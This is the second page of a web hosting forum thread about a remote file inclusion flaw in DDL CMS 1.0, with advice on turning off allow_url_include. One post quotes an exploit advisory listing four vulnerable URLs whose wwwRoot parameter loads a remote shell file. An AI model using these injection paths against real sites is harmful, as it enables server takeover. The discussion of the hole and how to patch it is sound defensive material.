Activity Stream
48,167 MEMBERS
63741 ONLINE
besthostingforums On YouTube Subscribe to our Newsletter besthostingforums On Twitter besthostingforums On Facebook besthostingforums On facebook groups

Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17
  1.     
    #11
    Banned
    Website's:
    Dev-Security.net
    Actually Switchblade if the user downloads your database and the mysql server allows remote connections a user can simply logon to your database and if it is a forum can grant them admin rights and therefore can add multiple stuff to the forums keylogging accounts or more

  2.   Sponsored Links

  3.     
    #12
    Member
    Website's:
    InvestDude.com
    this shouldn't be a problem, most hosts by default turn allow_url_include off since its unsafe.

    to check just use a phpinfo.php file. Open a text editor and place the following codes..

    Code: 
    <?php 
    phpinfo(); 
    ?>
    save it as phpinfo.php then upload it to your webserver and run it in your browser like http://yourdomain.com/phpinfo.php

    Under PHP Core, you should find the allow_url_include and local value should be turned off.

    If it's on, then you need to disable it in php.ini and also in your htaccess.

    You can find php.ini under /usr/local/lib

    add/edit this line in your php.ini

    Code: 
    allow_url_include = Off
    also need to add the following line in your htaccess

    Code: 
    php_flag allow_url_include 0
    InvestDude.com Learn to make money by investing in hyips (high yield investment programs), affiliate marketing and tons of other method ;)

  4.     
    #13
    Respected Developer
    Website's:
    X4B.org
    Lol its a simple to fix exploit in the encoded portion. Those who know how to decode it can easily.

  5.     
    #14
    Member
    Website's:
    zomgbbqpizza.com evilddl.com scenemarket.org
    Here is the exploit, it was posted on milw0rm on the 21st of this month.

    Code: 
    +============================================================+
    |                                                            |
    | DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
    |                                                            |
    +============================================================+
    |                                                            |
    | Author : HxH                                               |
    |                                                            |
    | E-Mail : HxH[at]live[dot]at                                |
    |                                                            |
    +------------------------------------------------------------+
    |                                                            |
    | Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
    |                                                            |
    +------------------------------------------------------------+
    |                                                            |
    | Exploit :                                                  |
    |                                                            |
    | /header.php?wwwRoot=[Shell.txt?]                           |
    |                                                            |
    | /submit.php?wwwRoot=[Shell.txt?]                           |
    |                                                            |
    | /submitted.php?wwwRoot=[Shell.txt?]                        |
    |                                                            |
    | /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
    |                                                            |
    +============================================================+
    |                                                            |
    | Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
    |                                                            |
    +============================================================+
    Code: 
    http://www.milw0rm.com/exploits/9722

  6.     
    #15
    Member
    Website's:
    ddlcms.com xsaimex.com warezgod.com
    For the record, this is no longer an issue with the new release. Fixed.

  7.     
    #16
    Member
    Website's:
    zomgbbqpizza.com evilddl.com scenemarket.org
    How is that related to this thread.

  8.     
    #17
    Member
    Website's:
    donotclickme.com
    Its spam - Reported
    "Advertising may be described as the science of arresting the human intelligence long enough to get money from it."

    Stephen Butler Leacock (1869-1944)

Page 2 of 2 FirstFirst 12

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. 0-day WHCMS exploit
    By shadow.prx in forum General Discussion
    Replies: 3
    Last Post: 1st Jun 2012, 01:21 AM
  2. Windows RDP Exploit
    By JamesVaporH in forum Hosting Discussion
    Replies: 0
    Last Post: 18th Mar 2012, 05:57 PM
  3. WHMCS Exploit attacks.
    By dotvps in forum Hosting Discussion
    Replies: 21
    Last Post: 10th Dec 2011, 12:24 PM
  4. [Selling] [Exploit] Hot Exclusive YouTube Exploit [New]
    By Goob3r in forum Completed Transactions
    Replies: 1
    Last Post: 24th Aug 2010, 04:21 PM
  5. Buying exploit
    By mr.oug in forum Completed Transactions
    Replies: 6
    Last Post: 28th Dec 2008, 09:37 AM

Tags for this Thread

BE SOCIAL